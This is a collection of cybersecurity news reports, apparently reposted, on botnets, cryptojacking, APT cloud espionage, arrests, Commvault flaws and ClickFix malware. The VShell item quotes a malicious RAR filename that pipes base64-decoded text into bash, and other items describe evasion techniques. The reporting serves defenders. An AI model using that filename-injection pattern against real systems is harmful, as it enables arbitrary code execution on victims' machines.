2025-08-24 AI创业新闻

GeoServer Exploits, PolarEdge, and Gayfemboy Push Cybercrime Beyond Traditional Botnets

Cybersecurity researchers are calling attention to multiple campaigns that leverage known security vulnerabilities and expose Redis servers to various malicious activities, including leveraging the compromised devices as IoT botnets, residential proxies, or cryptocurrency mining infrastructure. The first set of attacks entails the exploitation of CVE-2024-36401 (CVSS score: 9.8), a critical remote code execution vulnerability impacting OSGeo GeoServer GeoTools that has been weaponized in cyber attacks since late last year. “Criminals have used the vulnerability to deploy legitimate software development kits (SDKs) or modified apps to gain passive income via network sharing or residential proxies,” Palo Alto Networks Unit 42 researchers Zhibin Zhang, Yiheng An, Chao Lei, and Haozhe Zhang said in a technical report. “This method of generating passive income is particularly stealthy.

It mimics a monetization strategy used by some legitimate app developers who choose SDKs instead of displaying traditional ads. This can be a well-intentioned choice that protects the user experience and improves app retention.” The cybersecurity company said attackers have been probing GeoServer instances exposed to the internet since at least early March 2025, leveraging the access to drop customized executables from adversary-controlled servers. The payloads are distributed via a private instance of a file-sharing server using transfer.sh, as opposed to a conventional HTTP web server. The applications used in the campaign aim to fly under the radar by consuming minimal resources, while stealthily monetizing victims’ internet bandwidth without the need for distributing custom malware.

The binaries, written in Dart, are designed to interact with legitimate passive income services, discreetly using the device resources for activities like bandwidth sharing. The approach is a win-win situation for all parties involved, as developers of the applications receive payments in exchange for integrating the feature, and the cybercriminals get to profit off unused bandwidth using a seemingly innocuous channel that doesn’t raise any red flags. “Once running, the executable operates covertly in the background, monitoring device resources and illicitly sharing the victim’s bandwidth whenever possible,” Unit 42 said. “This generates passive income for the attacker.” Telemetry data gathered by the company shows that there were over 7,100 publicly exposed GeoServer instances across 99 countries, with China, the United States, Germany, Great Britain, and Singapore taking the top five spots.

“This ongoing campaign showcases a significant evolution in how adversaries monetize compromised systems,” Unit 42 said. “The attackers’ core strategy focuses on stealthy, persistent monetization rather than aggressive resource exploitation. This approach favors long-term, low-profile revenue generation over easily detectable techniques.” The disclosure comes as Censys detailed the infrastructural backbone powering a large-scale IoT botnet called PolarEdge that comprises enterprise-grade firewalls and consumer-oriented devices like routers, IP cameras, and VoIP phones by taking advantage of known security vulnerabilities. Its exact purpose is currently not known, although it’s clear that the botnet isn’t being used for indiscriminate mass scanning.

The initial access is then abused to drop a custom TLS backdoor based on Mbed TLS that facilitates encrypted command-and-control, log cleanup, and dynamic infrastructure updates. The backdoor has been commonly observed deployed on high, non-standard ports, likely as a way to bypass traditional network scans and defensive monitoring scope. PolarEdge exhibits traits that align with an Operational Relay Box (ORB) network, with the attack surface management platform stating there are indications that the campaign started as far back as June 2023, reaching about 40,000 active devices as of this month. More than 70% of the infections are scattered across South Korea, the United States, Hong Kong, Sweden, and Canada.

“ORBs are compromised exit nodes that forward traffic in order to carry out additional compromises or attacks on behalf of threat actors,” security researcher Himaja Motheram said . “What makes ORBs so valuable to attackers is that they don’t need to take over the device’s core function – they can quietly relay traffic in the background while the device continues to operate normally, making detection by the owner or ISP unlikely.” In recent months, vulnerabilities in products from vendors such as DrayTek, TP-Link, Raisecom, and Cisco have been targeted by bad actors to infiltrate them and deploy a Mirai botnet variant codenamed gayfemboy , suggesting an expansion of the targeting scope. “The gayfemboy campaign spans multiple countries, including Brazil, Mexico, the United States, Germany, France, Switzerland, Israel, and Vietnam,” Fortinet said . “Its targets also cover a broad range of sectors, such as manufacturing, technology, construction, and media or communications.” Gayfemboy is capable of targeting various system architectures, including ARM, AArch64, MIPS R3000, PowerPC, and Intel 80386.

It incorporates four primary functions - Monitor , which tracks threads and processes while incorporating persistence and sandbox evasion techniques Watchdog , which attempts to bind to UDP port 47272 Attacker , which launches DDoS attacks using UDP, TCP, and ICMP protocols, and enables backdoor access by connecting to a remote server to receive commands Killer , which terminates itself if it receives the command from the server or detects sandbox manipulation “While Gayfemboy inherits structural elements from Mirai, it introduces notable modifications that enhance both its complexity and ability to evade detection,” security researcher Vincent Li said. “This evolution reflects the increasing sophistication of modern malware and reinforces the need for proactive, intelligence-driven defense strategies.” The findings also coincide with a cryptojacking campaign undertaken by a threat actor dubbed TA-NATALSTATUS that’s targeting exposed Redis servers to deliver cryptocurrency miners. The attack essentially involves scanning for unauthenticated Redis servers on port 6379, followed by issuing legitimate CONFIG, SET, and SAVE commands to execute a malicious cron job that’s designed to run a shell script that disables SELinux, performs defense evasion steps, block external connections to the Redis port in order to prevent rival actors from using the initial access pathway to get in, and terminate competing mining processes (e.g., Kinsing). Also deployed are scripts to install tools like masscan or pnscan, and then launching commands like “masscan –shard” to scan the internet for susceptible Redis instances.

The last step involves setting up persistence via an hourly cron job and kicking off the mining process. Cybersecurity firm CloudSEK said the activity is an evolution of an attack campaign disclosed by Trend Micro in April 2020, packing in new features to accommodate rootkit-like features to hide malicious processes and alter the timestamps of their files to fool forensic analysis. “By renaming system binaries like ps and top to ps.original and replacing them with malicious wrappers, they filter their own malware (httpgd) out of the output. An admin looking for the miner won’t see it using standard tools,” researcher Abhishek Mathew said .

“They rename curl and wget to cd1 and wd1. This is a simple but brilliant method to bypass security products that monitor for malicious downloads specifically initiated by these common tool names.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Linux Malware Delivered via Malicious RAR Filenames Evades Antivirus Detection

Cybersecurity researchers have shed light on a novel attack chain that employs phishing emails to deliver an open-source backdoor called VShell . The “Linux-specific malware infection chain that starts with a spam email with a malicious RAR archive file,” Trellix researcher Sagar Bade said in a technical write-up. “The payload isn’t hidden inside the file content or a macro, it’s encoded directly in the filename itself. Through clever use of shell command injection and Base64-encoded Bash payloads, the attacker turns a simple file listing operation into an automatic malware execution trigger.” The technique, the cybersecurity company added, takes advantage of a simple yet dangerous pattern commonly observed in shell scripts that arises when file names are evaluated with inadequate sanitization, thereby causing a trivial command like eval or echo to facilitate the execution of arbitrary code.

What’s more, the technique offers the added advantage of getting around traditional defenses, as antivirus engines don’t typically scan file names. The starting point of the attack is an email message containing a RAR archive, which includes a file with a maliciously crafted file name: “ziliao2.pdf{echo,<Base64-encoded command>}|{base64,-d}|bash” Specifically, the file name incorporates Bash-compatible code that’s engineered to execute commands when it’s interpreted by the shell. It’s worth noting that simply extracting the file from the archive does not trigger execution. Rather, it occurs only when a shell script or command attempts to parse the file name.

Another important aspect to consider here is that it’s not possible to manually create a file name with this syntax, meaning it was likely created using another language or dropped using an external tool or script that bypasses shell input validation, Trellix said. This, in turn, leads to the execution of an embedded Base64-encoded downloader, which then retrieves from an external server an ELF binary for the appropriate system architecture (x86_64, i386, i686, armv7l, or aarch64). The binary, for its part, initiates communication with a command-and-control (C2) server to obtain the encrypted VShell payload, decode, and execute it on the host. Trellix said the phishing emails are disguised as an invitation for a beauty product survey, luring recipients with a monetary reward (10 RMB) for completing it.

“Crucially, the email includes a RAR archive attachment (‘yy.rar’), even though it doesn’t explicitly instruct the user to open or extract it,” Bade explained. “The social engineering angle is subtle: The user is distracted by the survey content, and the presence of the attachment might be mistaken for a survey-related document or data file.” VShell is a Go-based remote access tool that has been widely put to use by Chinese hacking groups in recent years, including UNC5174 , supporting reverse shell, file operations, process management, port forwarding, and encrypted C2 communications. What makes this attack dangerous is that the malware operates entirely in-memory, avoiding disk-based detection, not to mention it can target a wide range of Linux devices. “This analysis highlights a dangerous evolution in Linux malware delivery where a simple file name embedded in a RAR archive can be weaponized to execute arbitrary commands,” Trellix said.

“The infection chain exploits command injection in shell loops, abuses Linux’s permissive execution environment, and ultimately delivers a powerful backdoor VShell malware capable of full remote control over the system.” The development comes as Picus Security released a technical analysis of a Linux-focused post-exploit tool dubbed RingReaper that leverages the Linux kernel’s io_uring framework to circumvent traditional monitoring tools. It’s currently not known who is behind the malware. “Instead of invoking standard functions such as read, write, recv, send, or connect, RingReaper employs io_uringprimitives (e.g., io_uring_prep_*) to execute equivalent operations asynchronously,” security researcher Sıla Özeren Hacıoğlu said . “This method helps bypass hook-based detection mechanisms and reduces the visibility of malicious activity in telemetry commonly gathered by EDR platforms.” RingReaper makes use of io_uring to enumerate system processes, active pseudo-terminal (PTS) sessions, network connections, and logged-in users, while reducing its footprint and avoiding detection.

It’s also capable of collecting user information from the “/etc/passwd” file, abusing SUID binaries for privilege escalation, and erasing traces of itself after execution. “It exploits the Linux kernel’s modern asynchronous I/O interface, io_uring, to minimize reliance on conventional system calls that security tools frequently monitor or hook,” Picus said. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Chinese Hackers Murky, Genesis, and Glacial Panda Escalate Cloud and Telecom Espionage

Cybersecurity researchers are calling attention to malicious activity orchestrated by a China-nexus cyber espionage group known as Murky Panda that involves abusing trusted relationships in the cloud to breach enterprise networks. “The adversary has also shown considerable ability to quickly weaponize N-day and zero-day vulnerabilities and frequently achieves initial access to their targets by exploiting internet-facing appliances,” CrowdStrike said in a Thursday report. Murky Panda, also known as Silk Typhoon (formerly Hafnium), is best known for its zero-day exploitation of Microsoft Exchange Server flaws in 2021. Attacks mounted by the hacking group have targeted government, technology, academic, legal, and professional services entities in North America.

Earlier this March, Microsoft detailed the threat actor’s shift in tactics, detailing its targeting of the information technology (IT) supply chain as a means to obtain initial access to corporate networks. It’s assessed that Murky Panda’s operations are driven by intelligence gathering. Like other Chinese hacking groups, Murky Panda has exploited internet-facing appliances to obtain initial access and is believed to have also compromised small office/home office (SOHO) devices that are geolocated in the targeted country as an exit node to hinder detection efforts. Other infection pathways include exploitation of known security flaws in Citrix NetScaler ADC and NetScaler Gateway ( CVE-2023-3519 ) and Commvault ( CVE-2025-3928 ).

The initial access is leveraged to deploy web shells like neo-reGeorg to establish persistence and ultimately drop a custom malware called CloudedHope. A 64-bit ELF binary and written in Golang, CloudedHope functions as a basic remote access tool (RAT) while employing anti-analysis and operational security (OPSEC) measures, such as modifying timestamps and deleting indicators of their presence in victim environments to fly under the radar. But a notable aspect of Murky Panda’s tradecraft concerns the abuse of trusted relationships between partner organizations and their cloud tenants, exploiting zero-day vulnerabilities to breach software-as-a-service (SaaS) providers’ cloud environments and conduct lateral movement to downstream victims. In at least one instance observed in late 2024, the threat actor is said to have compromised a supplier of a North American entity and used the supplier’s administrative access to the victim entity’s Entra ID tenant to add a temporary backdoor Entra ID account.

“Using this account, the threat actor then backdoored several preexisting Entra ID service principles related to Active Directory management and emails,” CrowdStrike said. “The adversary’s goals appear targeted in nature based on their focus on accessing emails.” From Murky to Genesis Another China-linked threat actor that has proven skilful at manipulating cloud services is Genesis Panda , which has been observed using the infrastructure for basic exfiltration and targeting cloud service provider (CSP) accounts to expand access and establish fallback persistent mechanisms. Active since at least January 2024, Genesis Panda has been attributed to high-volume operations targeting the financial services, media, telecommunications, and technology sectors spanning 11 countries. The goal of the attacks is to enable access for future intelligence-collection activity.

The possibility that it acts as an initial access broker stems from the group’s exploitation of a wide range of web-facing vulnerabilities and limited data exfiltration. “Although Genesis Panda targets a variety of systems, they show consistent interest in compromising cloud-hosted systems to leverage the cloud control plane for lateral movement, persistence, and enumeration,” CrowdStrike said . The adversary has observed “consistently” querying the Instance Metadata Service (IMDS) associated with a cloud-hosted server to obtain credentials for the cloud control plane and enumerate network and general instance configurations. It’s also known to use credentials, likely obtained from compromised virtual machines (VMs), to burrow deeper into the target’s cloud account.

The findings illustrate how Chinese hacking groups are becoming increasingly adept at breaking and navigating cloud environments, while also prioritizing stealth and persistence to ensure sustained access and covert data harvesting. Glacial Panda Strikes Telecom Sector The telecommunications sector , per CrowdStrike, has witnessed a 130% increase in nation-state activity over the past year , primarily driven by the fact they are a treasure trove of intelligence. The latest threat actor to train its sights on the industry vertical is a Chinese threat actor dubbed Glacial Panda . The geographic footprint of the hacking group spans Afghanistan, Hong Kong, India, Japan, Kenya, Malaysia, Mexico, Panama, the Philippines, Taiwan, Thailand, and the United States.

“Glacial Panda highly likely conducts targeted intrusions for intelligence collection purposes, accessing and exfiltrating call detail records and related communications telemetry from multiple telecommunications organizations,” the cybersecurity company said. “The adversary primarily targets Linux systems typical in the telecommunications industry, including legacy operating system distributions that support older telecommunications technologies.” Attack chains implemented by the threat actor make use of known security vulnerabilities or weak passwords aimed at internet-facing and unmanaged servers, with follow-on activities leveraging privilege escalation bugs like CVE-2016-5195 (aka Dirty COW) and CVE-2021-4034 (aka PwnKit). Besides relying on living-off-the-land (LotL) techniques, Glacial Panda’s intrusions pave the way for the deployment of trojanized OpenSSH components, collectively codenamed ShieldSlide, to gather user authentication sessions and credentials. “The ShieldSlide-trojanized SSH server binary also provides backdoor access, authenticating any account (including root) when a hardcoded password is entered,” CrowdStrike said.

Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Automation Is Redefining Pentest Delivery

Pentesting remains one of the most effective ways to identify real-world security weaknesses before adversaries do. But as the threat landscape has evolved, the way we deliver pentest results hasn’t kept pace. Most organizations still rely on traditional reporting methods—static PDFs, emailed documents, and spreadsheet-based tracking. The problem?

These outdated workflows introduce delays, create inefficiencies, and undermine the value of the work. Security teams need faster insights, tighter handoffs, and clearer paths to remediation. That’s where automated delivery comes in. Platforms like PlexTrac automate pentest finding delivery in real time through robust, rules-based workflows.

(No waiting for the final report!) The Static Delivery Problem in a Dynamic World Delivering a pentest report solely as a static document might have made sense a decade ago, but today it’s a bottleneck. Findings are buried in long documents that don’t align with how teams operate day-to-day. After receiving the report, stakeholders must manually extract findings, create tickets in platforms like Jira or ServiceNow, and coordinate remediation tracking through disconnected workflows. By the time remediation begins, days or weeks may have passed since the issues were discovered.

Why Automation Matters Now As organizations adopt Continuous Threat Exposure Management (CTEM) and expand the frequency of offensive testing, the volume of findings rapidly grows. Without automation, teams struggle to keep up. Automating delivery helps cut through the noise and deliver results in real time for faster handoffs and visibility across the entire vulnerability lifecycle. Benefits of automating pentest delivery include: Real-time actionability: Act on findings immediately, not after the report is finalized Faster response: Accelerate remediation, retesting and validation Standardized operations: Ensure every finding follows a consistent process Less manual work: Free teams to focus on strategic initiatives Improved focus: Keep teams focused on what matters Service providers gain a competitive advantage by automating delivery and integrating directly into client workflows, making themselves an indispensable partner to drive client value.

For enterprises, it’s a fast track to operational maturity and a measurable reduction in mean time to remediation (MTTR). 5 Key Components of Automated Pentest Delivery
Centralized data ingestion: Start by consolidating all findings—manual and automated—into a single source of truth. This includes outputs from scanners (like Tenable, Qualys, Wiz, Snyk) as well as manual pentest findings. Without centralization, vulnerability management becomes a patchwork of disconnected tools and manual processes.

Automated real-time delivery: As findings are identified, they should be automatically routed to the right people and workflows without waiting for the full report. Predefined rulesets should trigger triage, ticketing, and tracking to allow remediation to begin while testing is still in progress. Automated routing & ticketing: Standardize routing by defining rules based on severity, asset ownership, and exploitability. Automation can assign findings, generate tickets in tools like Jira or ServiceNow, notify stakeholders through Slack or email, and close out informational issues to ensure findings are automatically routed to the right teams and systems.

Standardized remediation workflows: Every finding from your centralized data should follow the same lifecycle from triage to closure based on the criteria you’ve set, regardless of source. Whether it’s discovered from a scanner or manual testing, the process from triage to fix should be consistent and traceable. Triggered retesting & validation: When a finding is marked as resolved, automation should trigger the appropriate retesting or validation workflow. This ensures nothing slips through the cracks and keeps communication between security and IT teams coordinated and closed-loop.

PlexTrac supports each of these capabilities through its Workflow Automation Engine, helping teams unify and accelerate delivery, remediation, and closure in one platform. Avoid Common Pitfalls Automation is about more than just speed. It’s about building standardized, scalable systems. However, if not implemented thoughtfully, it can create new problems.

Watch out for:
Overcomplicating early efforts: Trying to automate everything at once can stall momentum. Start small and focus on a few repeatable workflows first. Add complexity over time and expand as you validate success. Treating automation as a one-time setup; Your workflows should evolve alongside your tools, team structure, and priorities.
Failing to iterate leads to stale processes that no longer align with how teams operate. Automating without clearly defined workflows:
Jumping into automation without first mapping out your current workflows often leads to chaos. Without clear rules for routing, ownership, and escalation, automation may create more problems than it solves. How to get started
Here’s how to begin automating pentest delivery:
Map your current workflow: Document how findings are delivered, triaged, assigned, and tracked today.
Identify friction points: Look for repetitive tasks, handoff delays, and areas where communication breaks down. Start small : Automate one or two high-impact steps first , like ticket creation, email alerts, or finding delivery. Add complexity over time as you validate what’s working well and use early results to evolve workflows, add rules, and further streamline. Choose the right platform; Look for solutions that integrate with your existing tools and provide visibility across the vulnerability lifecycle.
Measure impact: Track metrics like MTTR, handoff delays, and retest completion to show the value of your efforts. The Future of Pentest Delivery Security teams are shifting from reactive testing to proactive exposure management. Pentest delivery automation is a key part of that evolution to help teams move faster, collaborate better, and reduce risk more effectively. For Service Providers, this is a chance to differentiate services, scale operations, and deliver more value with less overhead.

For Enterprise teams, it means driving maturity, demonstrating progress, and staying ahead of emerging threats. Conclusion Pentesting is too important to be stuck in static reports and manual workflows. By automating delivery, routing, and remediation tracking, organizations can unlock the full value of their offensive security efforts by making findings more actionable, standardizing remediation workflows, and delivering measurable outcomes. Whether you’re delivering tests to clients or to an internal team, the message is clear: The future of pentest delivery is automated.

Want to see what automated pentest workflows look like in action? Platforms like PlexTrac centralize security data from both manual testing and automated tools , enabling real-time delivery and standardized workflows across the entire vulnerability lifecycle. Found this article interesting? This article is a contributed piece from one of our valued partners.

INTERPOL Arrests 1,209 Cybercriminals Across 18 African Nations in Global Crackdown

INTERPOL on Friday announced that authorities from 18 countries across Africa have arrested 1,209 cybercriminals who targeted 88,000 victims. “The crackdown recovered $97.4 million and dismantled 11,432 malicious infrastructures, underscoring the global reach of cybercrime and the urgent need for cross-border cooperation,” the agency said . The effort is the second phase of an ongoing law enforcement initiative called Operation Serengeti , which took place between June and August 2025 to tackle severe crimes like ransomware, online scams. and business email compromise (BEC).

The first wave of arrests occurred late last year. Among the highlights are the dismantling of 25 cryptocurrency mining centres in Angola, where 60 Chinese nationals were involved in the illicit money-making scheme. “The crackdown identified 45 illicit power stations which were confiscated, along with mining and IT equipment worth more than $37 million, now earmarked by the government to support power distribution in vulnerable areas,” INTERPOL said. Elsewhere, Zambian authorities have taken down a large-scale online investment fraud operation that claimed 65,000 victims who lost around $300 million after they were lured into investing in cryptocurrency through advertising campaigns that promised high-yield returns.

Fifteen individuals have been arrested in connection with the scheme, with officials seizing domains, mobile numbers, and bank accounts for further investigation. Also disrupted in the southern African country is a scam center and a suspected human trafficking network. Lastly, law enforcement also tore down a transnational inheritance scam originating in Germany, arresting the primary suspect and confiscating electronics, jewellery, cash, and vehicles. The scam is estimated to have caused losses of around $1.6 million.

“Each INTERPOL-coordinated operation builds on the last, deepening cooperation, increasing information sharing and developing investigative skills across member countries,” Valdecy Urquiza, secretary general of INTERPOL, said. “With more contributions and shared expertise, the results keep growing in scale and impact. This global network is stronger than ever, delivering real outcomes and safeguarding victims.” Singapore-headquartered Group-IB said it provided “circumstantial intelligence” on a cryptocurrency investment scam, along with infrastructural details associated with the scam and other BEC campaigns across the African region. “Cybercrime recognizes no borders, and its impact is truly global,” Dmitry Volkov, Group-IB CEO, said .

“The success of Operation Serengeti 2.0 demonstrates what can be achieved when nations stand together against this threat.” In a post shared on LinkedIn, blockchain intelligence platform TRM Labs said investigators pursued leads tied to the Bl00dy ransomware group in Ghana and acted on information connected to RansomHub , another ransomware operation that abruptly went offline earlier this April. Countries that participated in the crackdown include Angola, Benin, Cameroon, Chad, Côte d’Ivoire, Democratic Republic of Congo, Gabon, Ghana, Kenya, Mauritius, Nigeria, Rwanda, Senegal, South Africa, Seychelles, Tanzania, the United Kingdom, Zambia and Zimbabwe. The disclosure comes as Nigeria deported 102 foreign nationals, including 60 Chinese and 39 people from the Philippines , who were convicted of cyber terrorism and internet fraud, according to the country’s Economic and Financial Crimes Commission (EFCC). The deportees were among 792 suspected cybercriminals arrested in December 2024.

Earlier this March, law enforcement authorities in seven African countries also arrested 306 suspects and confiscated 1,842 devices as part of an international operation codenamed Red Card that took place between November 2024 and February 2025. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Ex-Developer Jailed Four Years for Sabotaging Ohio Employer with Kill-Switch Malware

A 55-year-old Chinese national has been sentenced to four years in prison and three years of supervised release for sabotaging his former employer’s network with custom malware and deploying a kill switch that locked out employees when his account was disabled. Davis Lu, 55, of Houston, Texas, was convicted of causing intentional damage to protected computers in March 2025. He was arrested and charged in April 2021 for abusing his position as a software developer to execute malicious code on his employer’s computer servers. The name of the company was not disclosed, but Cleveland.com revealed he was employed at Eaton Corporation, a multinational power management company that’s headquartered in Beachwood, Ohio.

“The defendant breached his employer’s trust by using his access and technical knowledge to sabotage company networks, wreaking havoc and causing hundreds of thousands of dollars in losses for a U.S. company,” said Acting Assistant Attorney General Matthew R. Galeotti of the Justice Department’s Criminal Division. “However, the defendant’s technical savvy and subterfuge did not save him from the consequences of his actions.” Court documents show that Lu was employed as a software developer for the unnamed company based in Ohio from November 2007 to October 2019.

But after his responsibilities and system access were reduced following a 2018 corporate realignment, Lu enacted a scheme to deliberately introduce malicious code around August 2019, resulting in system crashes and preventing user logins. To pull this off, Lu is said to have created infinite loops in source code to trigger server crashes by repeatedly creating new Java threads without proper termination. He also deleted coworker profile files and implemented a kill switch that would lock out all users if his credentials in the company’s Active Directory were disabled. “The ‘kill switch’ code – which Lu named ‘IsDLEnabledinAD,’ abbreviating ‘Is Davis Lu enabled in Active Directory’ — was automatically activated when he was placed on leave and asked to surrender his laptop on September 9, 2019, and impacted thousands of company users globally,” the Department of Justice said.

“Lu named other code ‘Hakai,’ a Japanese word meaning ‘destruction,’ and ‘HunShui,’ a Chinese word meaning ‘sleep’ or ‘lethargy.’” Furthermore, on the day Lu was instructed to return his company-issued laptop, the defendant deleted encrypted volumes and attempted to erase Linux directories and two additional projects. His internet search history laid bare the methods he researched to escalate privileges, hide processes, and delete files, suggesting an attempt to obstruct the company’s efforts to resolve the issues. Lu’s unlawful actions are estimated to have cost the company hundreds of thousands of dollars in losses, per the department. This case also underscores the importance of identifying insider threats early, added Assistant Director Brett Leatherman of the Federal Bureau of Investigation’s (FBI) Cyber Division.

Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Pre-Auth Exploit Chains Found in Commvault Could Enable Remote Code Execution Attacks

Commvault has released updates to address four security gaps that could be exploited to achieve remote code execution on susceptible instances. The list of vulnerabilities, identified in Commvault versions before 11.36.60, is as follows - CVE-2025-57788 (CVSS score: 6.9) - A vulnerability in a known login mechanism allows unauthenticated attackers to execute API calls without requiring user credentials CVE-2025-57789 (CVSS score: 5.3) - A vulnerability during the setup phase between installation and the first administrator login that allows remote attackers to exploit the default credentials to gain admin control CVE-2025-57790 (CVSS score: 8.7) - A path traversal vulnerability that allows remote attackers to perform unauthorized file system access through a path traversal issue, resulting in remote code execution CVE-2025-57791 (CVSS score: 6.9) - A vulnerability that allows remote attackers to inject or manipulate command-line arguments passed to internal components due to insufficient input validation, resulting in a valid user session for a low-privilege role watchTowr Labs researchers Sonny Macdonald and Piotr Bazydlo have been credited with discovering and reporting the four security defects in April 2025. All the flagged vulnerabilities have been resolved in versions 11.32.102 and 11.36.60. Commvault SaaS solution is not affected.

In an analysis published Wednesday, the cybersecurity company said threat actors could fashion these vulnerabilities into two pre-authenticated exploit chains to achieve code execution on susceptible instances: One that combines CVE-2025-57791 and CVE-2025-57790, and the other that strings CVE-2025-57788, CVE-2025-57789, and CVE-2025-57790. It’s worth noting that the second pre-auth remote code execution chain becomes successful only if the built-in admin password hasn’t been changed since installation. The disclosure comes nearly four months after watchTowr Labs reported a critical Commvault Command Center flaw ( CVE-2025-34028 , CVSS score: 10.0) that could allow arbitrary code execution on affected installations. A month later, the U.S.

Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages

Threat actors have been observed leveraging the deceptive social engineering tactic known as ClickFix to deploy a versatile backdoor codenamed CORNFLAKE.V3. Google-owned Mandiant described the activity, which it tracks as UNC5518, as part of an access-as-a-service scheme that employs fake CAPTCHA pages as lures to trick users into providing initial access to their systems, which is then monetized by other threat groups. “The initial infection vector, dubbed ClickFix, involves luring users on compromised websites to copy a malicious PowerShell script and execute it via the Windows Run dialog box,” Google said in a report published today. The access provided by UNC5518 is assessed to be leveraged by at least two different hacking groups, UNC5774 and UNC4108, to initiate a multi-stage infection process and drop additional payloads - UNC5774, another financially motivated group that delivers CORNFLAKE as a way to deploy various subsequent payloads UNC4108, a threat actor with unknown motivation that uses PowerShell to deploy tools like VOLTMARKER and NetSupport RAT The attack chain likely begins with the victim landing a fake CAPTCHA verification page after interacting with search results that employ search engine optimization (SEO) poisoning or malicious ads.

The user is then tricked into running a malicious PowerShell command by launching the Windows Run dialog, which then executes the next-stage dropper payload from a remote server. The newly downloaded script checks if it’s running within a virtualized environment and ultimately launches CORNFLAKE.V3. Observed in both JavaScript and PHP versions, CORNFLAKE.V3 is a backdoor that supports the execution of payloads via HTTP, including executables, dynamic-link libraries (DLLs), JavaScript files, batch scripts, and PowerShell commands. It can also collect basic system information and transmit it to an external server.

The traffic is proxied through Cloudflare tunnels in an attempt to avoid detection. “CORNFLAKE.V3 is an updated version of CORNFLAKE.V2, sharing a significant portion of its codebase,” Mandiant researcher Marco Galli said. “Unlike V2, which functioned solely as a downloader, V3 features host persistence via a registry Run key, and supports additional payload types.” Both generations are markedly different from their progenitor, a C-based downloader that uses TCP sockets for command-and-control (C2) communications and only has the ability to run DLL payloads. Persistence on the host is achieved by means of Windows Registry changes.

At least three different payloads are delivered via CORNFLAKE.V3. This comprises an Active Directory reconnaissance utility, a script to harvest credentials via Kerberoasting, and another backdoor referred to as WINDYTWIST.SEA, a C version of WINDYTWIST that supports relaying TCP traffic, providing a reverse shell, executing commands, and removing itself. Select versions of WINDYTWIST.SEA have also been observed attempting to move laterally in the network of the infected machine. “To mitigate malware execution through ClickFix, organizations should disable the Windows Run dialog box where possible,” Galli said.

“Regular simulation exercises are crucial to counter this and other social engineering tactics. Furthermore, robust logging and monitoring systems are essential for detecting the execution of subsequent payloads, such as those associated with CORNFLAKE.V3.” The Rise of ClicFix Kits The use of ClickFix has soared in popularity among threat actors over the past year, as it dupes users into infected their machines under the pretext of helping the solve minor technical issues, completing CAPTCHA verification checks by impersonating Cloudflare Turnstile, or spoofing a Discord server supposedly needing to verify a user before they can join. This, in turn, entails giving users instructions that involve clicking prompts and copying, pasting, and running commands directly in the Windows Run dialog box, Windows Terminal, Windows PowerShell, or macOS Terminal, depending on the operating system used. “Because ClickFix relies on human intervention to launch the malicious commands, a campaign that uses this technique could get past conventional and automated security solutions,” Microsoft said in a detailed write-up.

“It’s often combined with delivery vectors such as phishing, malvertising, and drive-by compromises, most of which even impersonate legitimate brands and organizations to further reduce suspicion from their targets.” The social engineering ploy has been embraced by numerous threat actors to deliver information stealers ( Lumma Stealer ), remote access trojans (Xworm, AsyncRAT, NetSupport RAT, and SectopRAT), malware loaders (Latrodectus and MintsLoader), rootkits (r77), and banking trojans ( Lampion ). Microsoft said it has also observed several threat actors peddling configurable ClickFix builders (also called “Win + R”) on popular cybercrime forums since late 2024 from anywhere $200 to $1,500 per month. Other offerings include one-time and piece-meal solutions, for example, the source code, landing page, or the command-line used to kick off the infection, for prices between $200 and $500. “Some of these actors are bundling ClickFix builders into their existing kits that already generate various files such as LNK, JavaScript, and SVG files,” the Windows maker said.

“The kits offer creation of landing pages with a variety of available lures including Cloudflare.” “They also offer construction of malicious commands that users will paste into the Windows Run dialog. These kits claim to guarantee antivirus and web protection bypass (some even promise that they can bypass Microsoft Defender SmartScreen), as well as payload persistence.” To counter ClickFix-style attacks, it’s advised that users are educated to identify social engineering attacks and be careful of what’s being pasted in apps like Terminal or PowerShell. Organizations are recommended to consider using enterprise-managed browsers, block web pages from automatically running Flash plugins, and turn on safe attachments policies for incoming messages. Other steps include - Enable PowerShell script block logging to detect and analyze obfuscated or encoded commands for enhanced visibility Use PowerShell execution policies such as setting AllSigned or RemoteSigned to help reduce the risk of malicious execution Use Group Policy to deploy hardening configurations, such as removing Run menu from Start Menu, prohibiting the launch of native Windows binaries from Run, and configuring Windows Terminal access to alert users when they pasting text that contains multiple lines USB Infection Drops XMRig Miner The disclosure comes as the threat intelligence firm detailed an ongoing campaign that employs USB drives to infect other hosts and deploy cryptocurrency miners since September 2024.

“This demonstrates the continued effectiveness of initial access via infected USB drives,” Mandiant said . “The low cost and ability to bypass network security make this technique a compelling option for attackers.” The attack chain starts when a victim is tricked into executing a Windows shortcut (LNK) in the compromised USB drive. The LNK file results in the execution of a Visual Basic script also located in the same folder. The script, for its part, launches a batch script to initiate the infection - DIRTYBULK , a C++ DLL launcher to initiate the execution of other malicious components, such as CUTFAIL CUTFAIL , a C++ malware dropper responsible for decrypting and installing malware onto a system, such as HIGHREPS and PUMPBENCH, as well as third-libraries like OpenSSL, libcurl, and WinPthreadGC HIGHREPS , a downloader that retrieves additional files to ensure persistence of PUMPBENCH PUMPBENCH , a C++ backdoor that facilitates reconnaissance, provides remote access by communicating with a PostgreSQL database server, and download XMRig XMRig , an an open-source software for mining cryptocurrencies such as Monero, Dero, and Ravencoin “PUMPBENCH spreads by infecting USB drives,” Mandiant said.

“It scans the system for available drives and then creates a batch file, a VBScript file, a shortcut file, and a DAT file.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Weak Passwords and Compromised Accounts: Key Findings from the Blue Report 2025

